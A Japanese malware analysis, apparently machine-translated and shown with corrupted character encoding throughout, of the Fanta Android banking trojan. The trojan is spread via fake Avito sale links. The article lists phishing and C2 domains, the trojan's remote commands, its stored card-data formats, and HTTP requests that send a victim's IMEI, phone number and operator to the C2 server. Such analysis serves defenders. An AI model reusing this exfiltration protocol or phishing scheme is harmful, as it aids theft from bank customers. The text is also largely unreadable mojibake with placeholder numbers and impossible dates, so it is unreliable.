ããæ¥ãAvito ã§äœãã販売ããããšèãã補å (RAM ã¢ãžã¥ãŒã«ãªã©) ã®è©³çŽ°ãªèª¬æãæçš¿ãããšã次ã®ã¡ãã»ãŒãžã衚瀺ãããŸãã
ãç¶è¡ããã¿ã³ãã¯ãªãã¯ãããšãã¢ã€ã³ã³ãšä¿¡é Œæ§ãé«ããååãä»ãã APK ãã¡ã€ã«ã Android ããã€ã¹ã«ããŠã³ããŒããããŸãã äœããã®çç±ã§ AccessibilityService æš©éãèŠæ±ããã¢ããªã±ãŒã·ã§ã³ãã€ã³ã¹ããŒã«ããåŸãããã€ãã®ãŠã£ã³ããŠã衚瀺ãããããã«æ¶ããŠããŸããŸãã...ããã ãã§ãã
æ®é«ã確èªããããšãããšãäœããã®çç±ã§éè¡ã¢ããªãã«ãŒãã®è©³çŽ°ãå床èŠæ±ããŸãã ããŒã¿ãå ¥åããåŸãäœãæãããããšãèµ·ãããŸããäœããã®çç±ã§ããŸã äžæã§ãããã¢ã«ãŠã³ããããéãæ¶ãå§ããŸãã ããªãã¯åé¡ã解決ããããšããŠããŸãããé»è©±æ©ã¯æµæããŸãããæ»ããããŒãšãããŒã ãããŒãæŒãã ãã§é»æºãåãããã»ãã¥ãªãã£å¯Ÿçãæå¹ã«ããããšãã§ããŸããã ãã®çµæããéããªããªããååãè³Œå ¥ããããäœãèµ·ãã£ãã®ãæ··ä¹±ããŠããŸããŸãã
çãã¯ç°¡åã§ããããªãã¯ãFlexnet ãã¡ããªã®ã¡ã³ããŒã§ãã Android ããã€ã®æšéŠ¬ Fanta ã®è¢«å®³è ã«ãªã£ãã®ã§ãã ã©ãããŠãããªã£ãïŒ ã§ã¯èª¬æããŸãããã
èè ïŒ ã¢ã³ãã¬ã€ã»ãããã³ãã³ããã«ãŠã§ã¢åæã®ãžã¥ã㢠ã¹ãã·ã£ãªã¹ãã ã€ã¯ã³ã»ããµã¬ãããã«ãŠã§ã¢åæã®å°é家ã
ããã€ãã®çµ±èš
Android ããã€ã®æšéŠ¬ã® Flexnet ãã¡ããªã¯ã2015 幎ã«åããŠç¥ãããããã«ãªããŸããã ããªãé·ã掻åæéãçµãŠããã®ç§ã¯ãã¡ã³ã¿ãã©ã€ã ãããããªããã³ãªã©ã®ããã€ãã®äºçš®ã«æ¡å€§ããŸããã ãã®ããã€ã®æšéŠ¬ãšããã«é¢é£ããã€ã³ãã©ã¹ãã©ã¯ãã£ã¯ç«ã¡æ¢ãŸã£ãŠããŸãããæ°ããå¹æçãªé åžã¹ããŒã ãéçºãããŠããŸããç§ãã¡ã®å Žåãç¹å®ã®ãŠãŒã¶ãŒãšè²©å£²è ãçã£ãé«å質ã®ãã£ãã·ã³ã° ããŒãžã§ãããããã€ã®æšéŠ¬ã®éçºè ã¯æµè¡ã®ãã¬ã³ãã«åŸã£ãŠããŸãããŠã€ã«ã¹ã®æžã蟌㿠- ææããããã€ã¹ããããå¹ççã«ééãçã¿ãä¿è·ã¡ã«ããºã ããã€ãã¹ã§ããæ°ããæ©èœãè¿œå ããŸãã
ãã®èšäºã§èª¬æãããŠãããã£ã³ããŒã³ã¯ãã·ã¢ã®ãŠãŒã¶ãŒã察象ãšããŠããŸãããŠã¯ã©ã€ãã§ã¯å°æ°ã®ææããã€ã¹ãèšé²ãããŠãããã«ã¶ãã¹ã¿ã³ãšãã©ã«ãŒã·ã§ã¯ããã«å°æ°ã§ãã
Flexnet 㯠4 幎以äžã«ããã£ãŠ Android ããã€ã®æšéŠ¬ã®åéã«ååšããå€ãã®ç 究è ã«ãã£ãŠè©³çŽ°ã«ç 究ãããŠããŸããããäŸç¶ãšããŠè¯å¥œãªç¶æ ãä¿ã£ãŠããŸãã 2019 幎 35 æ以éãæœåšçãªæ害é¡ã¯ 2015 äžã«ãŒãã«ãè¶ ããŸãããããã¯ãã·ã¢ã§ã®ãã£ã³ããŒã³ã®ã¿ã察象ã§ãã XNUMX 幎ããã® Android ããã€ã®æšéŠ¬ã®ããŸããŸãªããŒãžã§ã³ãã¢ã³ããŒã°ã©ãŠã³ã ãã©ãŒã©ã ã§è²©å£²ããã詳现ãªèª¬æãèšèŒãããããã€ã®æšéŠ¬ã®ãœãŒã¹ ã³ãŒããèŠã€ãããŸããã ããã¯ãäžçã®è¢«å®³çµ±èšãããã«é©ãã¹ããã®ã§ããããšãæå³ããŸãã ãã®ãããªè人ã«ãšã£ãŠã¯æªããªãææšã§ã¯ãªãã§ããããã
販売ããè©æ¬ºãŸã§
å ã«çŽ¹ä»ããã€ã³ã¿ãŒãããåºåæ²èŒãµãŒãã¹ãAvitoãã®ãã£ãã·ã³ã°ããŒãžã®ã¹ã¯ãªãŒã³ã·ã§ãããããåããããã«ããã®ããŒãžã¯ç¹å®ã®è¢«å®³è åãã«çšæãããŠããã ã©ããããæ»æè 㯠Avito ã®ããŒãµãŒã® XNUMX ã€ã䜿çšãã販売è ã®é»è©±çªå·ãšååãããã³è£œåã®èª¬æãæœåºããŠããããã§ãã ããŒãžãå±éã㊠APK ãã¡ã€ã«ãæºåãããšã被害è ã«ã¯èªåã®ååãšã補åã®èª¬æãšè£œåã®ã販売ãã§åãåã£ãéé¡ãå«ããã£ãã·ã³ã° ããŒãžãžã®ãªã³ã¯ãèšèŒããã SMS ãéä¿¡ãããŸãã ãã¿ã³ãã¯ãªãã¯ãããšããŠãŒã¶ãŒã¯æªæã®ãã APK ãã¡ã€ã«ãFantaããåãåããŸãã
shcet491[.]ru ãã¡ã€ã³ã調æ»ãããšããããã®ãã¡ã€ã³ã Hostinger ã® DNS ãµãŒããŒã«å§ä»»ãããŠããããšãããããŸããã
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
ãã¡ã€ã³ ãŸãŒã³ ãã¡ã€ã«ã«ã¯ãIP ã¢ãã¬ã¹ 31.220.23[.]236ã31.220.23[.]243ãããã³ 31.220.23[.]235 ãæããšã³ããªãå«ãŸããŠããŸãã ãã ãããã¡ã€ã³ã®ãã©ã€ã㪠ãªãœãŒã¹ ã¬ã³ãŒã (A ã¬ã³ãŒã) ã¯ãIP ã¢ãã¬ã¹ 178.132.1[.]240 ã®ãµãŒããŒãæããŠããŸãã
IP ã¢ãã¬ã¹ 178.132.1[.]240 ã¯ãªã©ã³ãã«ããããã¹ãã£ã³ã°äŒç€Ÿã«å±ããŸãã ã¯ãŒã«ãã¹ããªãŒã ã IP ã¢ãã¬ã¹ 31.220.23[.]235ã31.220.23[.]236ãããã³ 31.220.23[.]243 ã¯è±åœã«ãããå ±æãã¹ãã£ã³ã° ãµãŒã㌠HOSTINGER ã«å±ããŠããŸãã ã¬ã³ãŒããŒãšããŠäœ¿çš openprov-ruã 次ã®ãã¡ã€ã³ã IP ã¢ãã¬ã¹ 178.132.1[.]240 ã«è§£æ±ºãããŸããã
- ã¹ãã«ã«ã«[.]ã«
- tovar-av[.]ru
- av-tovar[.]ru
- ã«ã»ã¹ãã«ã«[.]ã«
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
次ã®åœ¢åŒã®ãªã³ã¯ãã»ãŒãã¹ãŠã®ãã¡ã€ã³ããå©çšå¯èœã§ããããšã«æ³šæããŠãã ããã
http://(www.){0,1}<%domain%>/[0-9]{7}
ãã®ãã³ãã¬ãŒãã«ã¯ãSMS ã¡ãã»ãŒãžããã®ãªã³ã¯ãå«ãŸããŠããŸãã éå»ã®ããŒã¿ã«åºã¥ããŠãXNUMX ã€ã®ãã¡ã€ã³ãäžèšã®ãã¿ãŒã³ã®è€æ°ã®ãªã³ã¯ã«å¯Ÿå¿ããŠããããšãå€æããŸãããããã¯ãããã€ã®æšéŠ¬ãè€æ°ã®è¢«å®³è ã«é åžããããã« XNUMX ã€ã®ãã¡ã€ã³ã䜿çšãããããšã瀺ããŠããŸãã
å°ã話ãé²ããŸããããSMS ããã®ãªã³ã¯ãä»ããŠããŠã³ããŒããããããã€ã®æšéŠ¬ã¯ããã®ã¢ãã¬ã¹ãå¶åŸ¡ãµãŒããŒãšããŠäœ¿çšããŸãã ãªã³ãŠãŒãºãããã[.]ã¯ã©ãã ãã®ãã¡ã€ã³ã¯ 2019 幎 03 æ 12 æ¥ã«ç»é²ããã2019 幎 04 æ 29 æ¥ä»¥éãAPK ã¢ããªã±ãŒã·ã§ã³ã¯ãã®ãã¡ã€ã³ãšããåãããããã«ãªããŸããã VirusTotal ããååŸããããŒã¿ã«åºã¥ããšãåèš 109 ã®ã¢ããªã±ãŒã·ã§ã³ããã®ãµãŒããŒãšéä¿¡ããŠããŸããã ãã¡ã€ã³èªäœã IP ã¢ãã¬ã¹ã«è§£æ±ºããã 217.23.14[ã]27ããªã©ã³ãã«ããããã¹ãã£ã³ã°äŒç€ŸãææããŠããŸãã ã¯ãŒã«ãã¹ããªãŒã ã ã¬ã³ãŒããŒãšããŠäœ¿çš åæã ãã¡ã€ã³ããã® IP ã¢ãã¬ã¹ã«è§£æ±ºãããŸã æªãã¢ã©ã€ã°ã[.]ã¯ã©ã (2018-09-25ãã) æªãã¢ã©ã€ã°ã[.]ã©ã€ã (2018-10-25ãã)ã ãã¡ã€ã³ãã æªãã¢ã©ã€ã°ã[.]ã¯ã©ã 80 ãè¶ ãã APK ãã¡ã€ã«ãããåããããŸãã æªãã¢ã©ã€ã°ã[.]ã©ã€ã - 100 以äžã
äžè¬ã«ãæ»æã¯æ¬¡ã®ããã«é²è¡ããŸãã
ãã¡ã³ã¿ã®èã®äžã«ã¯äœãããã®ã§ããããïŒ
ä»ã®å€ãã® Android ããã€ã®æšéŠ¬ãšåæ§ã«ãFanta 㯠SMS ã¡ãã»ãŒãžã®èªã¿åããšéä¿¡ãUSSD ãªã¯ãšã¹ãã®äœæãããã³ã¢ããªã±ãŒã·ã§ã³ (éè¡æ¥åãå«ã) äžã«ç¬èªã®ãŠã£ã³ããŠã衚瀺ããããšãã§ããŸãã ãããããã®ãã¡ããªãŒã®æ©èœæ§ã®æŠåšãå°çããŸãããFanta ã¯æ¬¡ã®æ©èœã䜿ãå§ããŸããã ã¢ã¯ã»ã·ããªãã£ãµãŒãã¹ ããŸããŸãªç®ç: ä»ã®ã¢ããªã±ãŒã·ã§ã³ããã®éç¥ã®å 容ãèªã¿åããææããããã€ã¹ã§ã®ããã€ã®æšéŠ¬ã®æ€åºãšå®è¡ã®åæ¢ãªã©ã Fanta ã¯ãAndroid 4.4 以éã®ãã¹ãŠã®ããŒãžã§ã³ã§åäœããŸãã ãã®èšäºã§ã¯ã次㮠Fanta ãµã³ãã«ã詳ããèŠãŠãããŸãã
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
æã¡äžãçŽåŸ
ãã®ããã€ã®æšéŠ¬ã¯ãèµ·åçŽåŸã«ã¢ã€ã³ã³ãé衚瀺ã«ããŸãã ã¢ããªã±ãŒã·ã§ã³ã¯ãææããããã€ã¹ã®ååããªã¹ãã«ãªãå Žåã«ã®ã¿åäœããŸãã
- ã¢ã³ããã€ã_x86
- VirtualBox
- Nexus 5X(ãã«ããã)
- Nexus 5ïŒã«ããœãªïŒ
ãã®ãã§ãã¯ã¯ãããã€ã®æšéŠ¬ã®ã¡ã€ã³ ãµãŒãã¹ã§å®è¡ãããŸãã ã¡ã€ã³ãµãŒãã¹ã åããŠèµ·åãããšãã¢ããªã±ãŒã·ã§ã³ã®æ§æãã©ã¡ãŒã¿ãããã©ã«ãå€ã«åæåããïŒæ§æããŒã¿ãä¿åãã圢åŒãšãã®æå³ã«ã€ããŠã¯åŸè¿°ããŸãïŒãæ°ããææããã€ã¹ãå¶åŸ¡ãµãŒããŒã«ç»é²ãããŸãã ã¡ãã»ãŒãžã¿ã€ããå«ãHTTP POSTãªã¯ãšã¹ãããµãŒããŒã«éä¿¡ãããŸãã ç»é²ããã ææ端æ«ã«é¢ããæ å ±ïŒAndroidã®ããŒãžã§ã³ãIMEIãé»è©±çªå·ããªãã¬ãŒã¿ãŒåããªãã¬ãŒã¿ãŒãç»é²ãããŠããåœã³ãŒãïŒã ã¢ãã¬ã¹ã¯å¶åŸ¡ãµãŒããŒãšããŠæ©èœããŸã hXXp://onuseseddohap[.]club/controller.phpã å¿çãšããŠããµãŒããŒã¯æ¬¡ã®ãã£ãŒã«ããå«ãã¡ãã»ãŒãžãéä¿¡ããŸãã ãããID, bot_pwd, â ã¢ããªã±ãŒã·ã§ã³ã¯ãããã®å€ã CnC ãµãŒããŒã®ãã©ã¡ãŒã¿ãšããŠä¿åããŸãã ãã©ã¡ãŒã¿ ãã£ãŒã«ããåä¿¡ãããªãã£ãå Žåã¯ãªãã·ã§ã³: Fanta ã¯ç»é²ã¢ãã¬ã¹ã䜿çšããŸã - hXXp://onuseseddohap[.]club/controller.phpã CnC ã¢ãã¬ã¹ãå€æŽããæ©èœã¯ãè€æ°ã®ãµãŒããŒéã§è² è·ãåçã«åæ£ãã (ææããããã€ã¹ãå€æ°ããå Žåãæé©åãããŠããªã Web ãµãŒããŒã®è² è·ãé«ããªãå¯èœæ§ããã) ãšãã XNUMX ã€ã®åé¡ã解決ããããã«äœ¿çšã§ããŸãã CnC ãµãŒããŒã® XNUMX ã€ã«é害ãçºçããå Žåã®ä»£æ¿ãµãŒããŒã
ãªã¯ãšã¹ãã®éä¿¡äžã«ãšã©ãŒãçºçããå Žåãããã€ã®æšéŠ¬ã¯ 20 ç§åŸã«ç»é²ããã»ã¹ãç¹°ãè¿ããŸãã
ããã€ã¹ãæ£åžžã«ç»é²ããããšãFanta ã¯ãŠãŒã¶ãŒã«æ¬¡ã®ã¡ãã»ãŒãžã衚瀺ããŸãã
éèŠãªæ³šæäºé
: ãšåŒã°ãããµãŒãã¹ ã·ã¹ãã ã»ãã¥ãªã㣠â ããã€ã®æšéŠ¬ãµãŒãã¹ã®ååãããã³ãã¿ã³ãã¯ãªãã¯ããåŸ ÐÐ ææããããã€ã¹ã®ã¢ã¯ã»ã·ããªãã£èšå®ã瀺ããŠã£ã³ããŠãéããŸããããã§ããŠãŒã¶ãŒã¯æªæã®ãããµãŒãã¹ã«å¯Ÿããã¢ã¯ã»ã·ããªãã£æš©éãä»äžããå¿
èŠããããŸãã
ãŠãŒã¶ãŒãé»æºãå
¥ãããšããã« ã¢ã¯ã»ã·ããªãã£ãµãŒãã¹, Fanta ã¯ãã¢ããªã±ãŒã·ã§ã³ ãŠã£ã³ããŠã®å
容ãšããã§å®è¡ãããã¢ã¯ã·ã§ã³ã«ã¢ã¯ã»ã¹ããŸãã
ã¢ã¯ã»ã·ããªãã£æš©éãåãåã£ãçŽåŸãããã€ã®æšéŠ¬ã¯ç®¡çè
æš©éãšéç¥ãèªã¿åãæš©éãèŠæ±ããŸãã
AccessibilityService ã䜿çšããŠãã¢ããªã±ãŒã·ã§ã³ã¯ããŒã¹ãããŒã¯ãã·ãã¥ã¬ãŒãããããã«ãã£ãŠå¿
èŠãªãã¹ãŠã®æš©éãã¢ããªã±ãŒã·ã§ã³èªäœã«äžããŸãã
Fanta ã¯ãæ§æããŒã¿ãšããã®éçšã§åéãããææããã€ã¹ã«é¢ããæ å ±ãä¿åããããã«å¿ èŠãªè€æ°ã®ããŒã¿ããŒã¹ ã€ã³ã¹ã¿ã³ã¹ (åŸè¿°) ãäœæããŸãã åéããæ å ±ãéä¿¡ããããã«ãããã€ã®æšéŠ¬ã¯ããŒã¿ããŒã¹ãããã£ãŒã«ããããŠã³ããŒãããã³ã³ãããŒã« ãµãŒããŒããã³ãã³ããåä¿¡ããããã«èšèšãããç¹°ãè¿ãã¿ã¹ã¯ãäœæããŸãã CnC ãžã®ã¢ã¯ã»ã¹éé㯠Android ã®ããŒãžã§ã³ã«å¿ããŠèšå®ãããŠããã5.1 ã®å Žå㯠10 ç§ããã以å€ã®å Žå㯠60 ç§ã«ãªããŸãã
ã³ãã³ããåãåãããã«ããã¡ã³ã¿ã¯ãªã¯ãšã¹ããè¡ããŸã ã¿ã¹ã¯ã®ååŸ ç®¡çãµãŒããŒã«éä¿¡ããŸãã å¿çãšããŠãCnC ã¯æ¬¡ã®ã³ãã³ãã®ãããããéä¿¡ã§ããŸãã
ããŒã | 説æ |
---|---|
0 | SMSã¡ãã»ãŒãžãéä¿¡ãã |
1 | é»è©±ãããããUSSDã³ãã³ããå®è¡ãã |
2 | ãã©ã¡ãŒã¿ãæŽæ°ããŸã ã€ã³ã¿ãŒãã« |
3 | ãã©ã¡ãŒã¿ãæŽæ°ããŸã ã€ã³ã¿ãŒã»ãã |
6 | ãã©ã¡ãŒã¿ãæŽæ°ããŸã SMSãããŒãžã£ãŒ |
9 | SMS ã¡ãã»ãŒãžã®åéãéå§ãã |
11 | æºåž¯é»è©±ãå·¥å Žåºè·æã®èšå®ã«ãªã»ããããŸã |
12 | ãã€ã¢ãã°ããã¯ã¹äœæã®ãã°ãæå¹/ç¡å¹ã«ãã |
Fanta ã¯ãŸãã70 ã®éè¡ã¢ããªãé«éæ¯æãã·ã¹ãã ãé»åãŠã©ã¬ããããéç¥ãåéããããŒã¿ããŒã¹ã«ä¿åããŸãã
èšå®ãã©ã¡ãŒã¿ã®ä¿å
èšå®ãã©ã¡ãŒã¿ãä¿åããããã«ãFanta 㯠Android ãã©ãããã©ãŒã ã®æšæºçãªã¢ãããŒãã䜿çšããŸãã ç°å¢èšå®-ãã¡ã€ã«ã èšå®ã¯ããšããååã®ãã¡ã€ã«ã«ä¿åãããŸãã èšå®ã ä¿åããããã©ã¡ãŒã¿ã®èª¬æã以äžã®è¡šã«ç€ºããŸãã
åå | ããã©ã«ãå€ | å¯èœãªå€ | 説æ |
---|---|---|---|
id | 0 | æŽæ° | ãããID |
hXXp://onuseseddohap[.]club/ | URL | å¶åŸ¡ãµãŒããŒã¢ãã¬ã¹ | |
pwd | - | æåå | ãµãŒããŒãã¹ã¯ãŒã |
ã€ã³ã¿ãŒãã« | 20 | æŽæ° | æéééã 次ã®ã¿ã¹ã¯ã延æããæéã瀺ããŸãã
|
ã€ã³ã¿ãŒã»ãã | ã | ãã¹ãŠ/é»è©±çªå· | ãã£ãŒã«ããæååãšçããå Žå ã ãŸã㯠é»è©±çªå·ã®å Žåãåä¿¡ãã SMS ã¡ãã»ãŒãžã¯ã¢ããªã±ãŒã·ã§ã³ã«ãã£ãŠååããããŠãŒã¶ãŒã«ã¯è¡šç€ºãããŸããã |
SMSãããŒãžã£ãŒ | 0 | 0/1 | ã¢ããªã±ãŒã·ã§ã³ãããã©ã«ãã® SMS åä¿¡è ãšããŠæå¹/ç¡å¹ã«ãã |
èªã¿åããã€ã¢ãã° | false | ç/åœ | ã€ãã³ããã°ã®æå¹å/ç¡å¹å ã¢ã¯ã»ã·ããªãã£ã€ãã³ã |
Fanta ããã¡ã€ã«ã䜿çšããŸã SMSãããŒãžã£ãŒ:
åå | ããã©ã«ãå€ | å¯èœãªå€ | 説æ |
---|---|---|---|
ããã±ãŒãž | - | æåå | 䜿çšããã SMS ã¡ãã»ãŒãž ãããŒãžã£ãŒã®åå |
ããŒã¿ããŒã¹ãšã®å¯Ÿè©±
ãã®ããã€ã®æšéŠ¬ã¯ãåäœäžã« XNUMX ã€ã®ããŒã¿ããŒã¹ã䜿çšããŸãã ããŒã¿ããŒã¹ãšããåå a é»è©±ããåéãããããŸããŸãªæ å ±ãä¿åããããã«äœ¿çšãããŸãã XNUMX çªç®ã®ããŒã¿ããŒã¹ã®ååã¯æ¬¡ã®ãšããã§ãã ãã¡ã³ã¿.db éè¡ã«ãŒãã«é¢ããæ å ±ãåéããããã«èšèšããããã£ãã·ã³ã° ãŠã£ã³ããŠã®äœæã«é¢äžããèšå®ãä¿åããããã«äœ¿çšãããŸãã
ããã€ã®æšéŠ¬ã¯ããŒã¿ããŒã¹ã䜿çšããŸã а åéããæ å ±ãä¿åããã¢ã¯ã·ã§ã³ãèšé²ããŸãã ããŒã¿ã¯ããŒãã«ã«ä¿åãããŸã ãã°ã ããŒãã«ãäœæããã«ã¯ã次㮠SQL ã¯ãšãªã䜿çšããŸãã
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)
ããŒã¿ããŒã¹ã«ã¯æ¬¡ã®æ å ±ãå«ãŸããŠããŸãã
1. ææããããã€ã¹ã®èµ·åãã¡ãã»ãŒãžãšãšãã«èšé²ãã é»è©±ããªã³ã«ãªããŸããïŒ
2. ã¢ããªã±ãŒã·ã§ã³ããã®éç¥ã ã¡ãã»ãŒãžã¯æ¬¡ã®ãã³ãã¬ãŒãã«åŸã£ãŠçæãããŸãã
(<%App Name%>)<%Title%>: <%Notification text%>
3. ããã€ã®æšéŠ¬ã«ãã£ãŠäœæããããã£ãã·ã³ã° ãã©ãŒã ããã®éè¡ã«ãŒã ããŒã¿ã ãã©ã¡ãŒã¿ VIEW_NAME 次ã®ããããã«ãªããŸãã
- AliExpressã®
- ã¢ãã
- Google Playã§
- ãã®ä» <%ã¢ããªå%>
ã¡ãã»ãŒãžã¯æ¬¡ã®åœ¢åŒã§èšé²ãããŸãã
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) ÐÐŸÐŒÐµÑ ÐºÐ°ÑÑÑ:<%CARD_NUMBER%>; ÐаÑа:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. 次ã®åœ¢åŒã®åä¿¡/éä¿¡ SMS ã¡ãã»ãŒãž:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] ТОп: ÐÑ
ПЎÑÑее/ÐÑÑ
ПЎÑÑее) <%Mobile number%>:<%SMS-text%>
5. ãã€ã¢ãã° ããã¯ã¹ãäœæããããã±ãŒãžã«é¢ããæ å ±ã¯æ¬¡ã®åœ¢åŒã§ãã
(<%Package name%>)<%Package information%>
ããŒãã«ã®äŸ ãã°:
Fanta ã®æ©èœã® XNUMX ã€ã¯ããã£ãã·ã¥ ã«ãŒãã«é¢ããæ
å ±ã®åéã§ãã ããŒã¿åéã¯ããã³ãã³ã° ã¢ããªã±ãŒã·ã§ã³ãéãããšãã«ãã£ãã·ã³ã° ãŠã£ã³ããŠãäœæããããšã«ãã£ãŠè¡ãããŸãã ãã®ããã€ã®æšéŠ¬ã¯ããã£ãã·ã³ã° ãŠã£ã³ããŠã XNUMX åã ãäœæããŸãã ãŠã£ã³ããŠããŠãŒã¶ãŒã«è¡šç€ºããããšããæ
å ±ã¯ããŒãã«ã«ä¿åãããŸã èšå® ããŒã¿ããŒã¹å
㧠ãã¡ã³ã¿.dbã ããŒã¿ããŒã¹ãäœæããã«ã¯ã次㮠SQL ã¯ãšãªã䜿çšããŸãã
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);
ãã¹ãŠã®ããŒãã«ãã£ãŒã«ã èšå® ããã©ã«ãã§ã¯ 1 ã«åæåãããŸã (ãã£ãã·ã³ã° ãŠã£ã³ããŠãäœæããŸã)ã ãŠãŒã¶ãŒãããŒã¿ãå ¥åãããšãå€ã¯ 0 ã«èšå®ãããŸãã ããŒãã«ãã£ãŒã«ãã®äŸ èšå®:
- ãã°ã€ã³ã§ããŸã â ãã®ãã£ãŒã«ãã¯ãéè¡ã¢ããªã±ãŒã·ã§ã³ãéããšãã«ãã©ãŒã ã衚瀺ãã圹å²ãæãããŸãã
- æåã®éè¡ - 䜿çšãããŠããªã
- can_avito â ãã®ãã£ãŒã«ãã¯ãAvito ã¢ããªã±ãŒã·ã§ã³ãéãããšãã«ãã©ãŒã ã衚瀺ãã圹å²ãæãããŸãã
- 猶ã¢ãª â ãã®ãã£ãŒã«ãã¯ãAliexpress ã¢ããªã±ãŒã·ã§ã³ãéãããšãã«ãã©ãŒã ã衚瀺ãã圹å²ãæãããŸãã
- å¥ã®ããšãã§ããŸã â ãã®ãã£ãŒã«ãã¯ããªã¹ãããã¢ããªã±ãŒã·ã§ã³ãéãããšãã«ãã©ãŒã ã衚瀺ãã圹å²ãæãããŸãã ãŠã©ããã³ããªãããã ãªãŒãããŠã©ã¬ããã å²åŒããã³ããŒãã¹ ã«ãŒããAviasalesãäºçŽãããªããŽ
- 猶ã«ãŒã â ãã£ãŒã«ãã¯ããã©ãŒã ãéãããšãã«ãã©ãŒã ã衚瀺ãã責任ããããŸãã Google Playã§
管çãµãŒããŒãšã®å¯Ÿè©±
管çãµãŒããŒãšã®ãããã¯ãŒã¯éä¿¡ã¯ãHTTP ãããã³ã«çµç±ã§è¡ãããŸãã ãããã¯ãŒã¯ãšé£æºããããã«ãFanta ã¯äººæ°ã®ãã Retrofit ã©ã€ãã©ãªã䜿çšããŸãã ãªã¯ãšã¹ãã¯æ¬¡ã®å®å ã«éä¿¡ãããŸãã hXXp://onuseseddohap[.]club/controller.phpã ãµãŒããŒã¢ãã¬ã¹ã¯ãµãŒããŒç»é²æã«å€æŽã§ããŸãã ãµãŒããŒããã®å¿çãšã㊠Cookie ãéä¿¡ãããå ŽåããããŸãã Fanta ã¯ãµãŒããŒã«å¯ŸããŠæ¬¡ã®ãªã¯ãšã¹ããè¡ããŸãã
- ã³ã³ãããŒã« ãµãŒããŒãžã®ãããã®ç»é²ã¯ãæåã®èµ·åæã« XNUMX åã ãè¡ãããŸãã ææããããã€ã¹ã«é¢ãã次ã®ããŒã¿ããµãŒããŒã«éä¿¡ãããŸãã
· ã¯ãã㌠â ãµãŒããŒããåä¿¡ãã Cookie (ããã©ã«ãå€ã¯ç©ºã®æåå)
· ã¢ãŒã â æååå®æ° ç»é²ããã
· æ¥é èŸ â æŽå®æ° 2
· ããŒãžã§ã³_SDK â 次ã®ãã³ãã¬ãŒãã«åŸã£ãŠåœ¢æãããŸãã <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· ã€ã¡ã€ â ææããããã€ã¹ã®IMEI
· åœ â ãªãã¬ãŒã¿ãŒãç»é²ãããŠããåœã®ã³ãŒã (ISO 圢åŒ)
· æ° - é»è©±çªå·
· ãªãã¬ãŒã¿ â ãªãã¬ãŒã¿ãŒåãµãŒããŒã«éä¿¡ããããªã¯ãšã¹ãã®äŸ:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
ãªã¯ãšã¹ãã«å¿ããŠããµãŒããŒã¯æ¬¡ã®ãã©ã¡ãŒã¿ãå«ã JSON ãªããžã§ã¯ããè¿ãå¿ èŠããããŸãã
· bot_id â ææããããã€ã¹ã® IDã bot_id ã 0 ã®å ŽåãFanta ã¯ãªã¯ãšã¹ããåå®è¡ããŸãã
bot_pwd â ãµãŒããŒã®ãã¹ã¯ãŒãã
ãµãŒã â å¶åŸ¡ãµãŒããŒã®ã¢ãã¬ã¹ã ãªãã·ã§ã³ã®ãã©ã¡ãŒã¿ã ãã©ã¡ãŒã¿ãæå®ãããŠããªãå Žåã¯ãã¢ããªã±ãŒã·ã§ã³ã«ä¿åãããŠããã¢ãã¬ã¹ã䜿çšãããŸããJSON ãªããžã§ã¯ãã®äŸ:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- ãµãŒããŒããã®ã³ãã³ãã®åä¿¡ãèŠæ±ããŸãã 次ã®ããŒã¿ããµãŒããŒã«éä¿¡ãããŸãã
· ã¯ãã㌠â ãµãŒããŒããåä¿¡ãã Cookie
· å ¥æ â ãªã¯ãšã¹ãã®éä¿¡æã«åä¿¡ããææããã€ã¹ã® ID ç»é²ããã
· pwd âãµãŒããŒã®ãã¹ã¯ãŒã
· ããã€ã¹ç®¡çè â ãã®ãã£ãŒã«ãã¯ã管çè æš©éãååŸãããŠãããã©ããã決å®ããŸãã 管çè æš©éãååŸãããŠããå Žåããã£ãŒã«ãã¯æ¬¡ãšçãããªããŸãã 1ããã§ãªããã° 0
· ãŠãŒã¶ãŒè£å© â ãŠãŒã¶ãŒè£å©ãµãŒãã¹ã®åäœã¹ããŒã¿ã¹ã ãµãŒãã¹ãéå§ãããŠããå Žåãå€ã¯æ¬¡ã®ããã«ãªããŸãã 1ããã§ãªããã° 0
· SMSãããŒãžã£ãŒ â ããã€ã®æšéŠ¬ã SMS ãåä¿¡ããããã®ããã©ã«ãã®ã¢ããªã±ãŒã·ã§ã³ãšããŠæå¹ã«ãªã£ãŠãããã©ããã瀺ããŸã
· screen â ç»é¢ãã©ã®ãããªç¶æ ã«ãããã衚瀺ããŸãã å€ãèšå®ãããŸã 1ãç»é¢ããªã³ã®å Žåãããã§ãªãå Žå 0;ãµãŒããŒã«éä¿¡ããããªã¯ãšã¹ãã®äŸ:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>
ã³ãã³ãã«å¿ããŠããµãŒããŒã¯ããŸããŸãªãã©ã¡ãŒã¿ãæ〠JSON ãªããžã§ã¯ããè¿ãããšãã§ããŸãã
